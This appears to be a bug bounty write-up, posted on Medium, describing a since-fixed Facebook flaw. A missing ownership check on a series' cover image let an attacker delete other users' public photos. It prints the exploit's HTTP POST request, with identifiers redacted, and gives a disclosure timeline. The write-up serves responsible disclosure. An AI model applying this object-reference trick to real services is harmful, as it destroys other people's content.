Delete Any Photos In Facebook

This post is about an bug that I found on Facebook which used to delete any publicly visible photos by editing the series feature

Already a image removal vulnerability was found in same series feature by another researcher Pouya Darabi . this writeup is a bypassing the fix in different scenario.

Image for post
Image for post

The series has a option to set photos in Poster Art (Mandatory) and Cover Image as (optional)

Image for post
Image for post

When Creating a new series if attacker tries to modify the photo object of Poster Art and Cover Image the server validation was done properly and return a error. but when editing the series the Ownership check validation for Cover Image was missing.so any publicly visible photo id in Facebook can be associated with the Cover Image.

Image for post
Image for post

While replacing the “custom_thumbnail_id=xxx” value into any photo id and it will get associated with the series.

POST /media/manager/shows/edit_show_metadata/?show_id=xxx&title=xxx&description=&custom_thumbnail_id=xxx&is_serialized=false&poster_art_id=xxx&session_id=xxx&av=xxx HTTP/1.1
Host: business.facebook.com
Connection: close
Content-Length: 467
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36
Viewport-Width: 2048
Content-Type: application/x-www-form-urlencoded
Accept: */*
Origin: https://business.facebook.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://business.facebook.com/creatorstudio/?tab=content_shows&collection_id=all_pages
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: sb=xxx; datr=xxx; dpr=1.25; c_user=xxx;
__user=xxx&__a=1&fb_dtsg=xxx

and when deleting the series. all season videos, Poster Arts and Cover Images including victim’s photo also get deleted. but to completely delete the series . it will take around 30 to 45 seconds.

Image for post
Image for post

This issue was reported during BountyCon2020 event submission and Thank you Facebook Team for quickly addressing and fixing this issue.

Video poc:

Timeline:

5-Oct-2020: Report Sent

05-Oct-2020 : Further investigation by Facebook & Temporary Fix

10-Oct-2020: $10000 bounty + $750 bonus awarded by Facebook

31-Oct-2020: Fixed confirmed by Facebook and me

Image for post
Image for post

Web Security Researcher

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store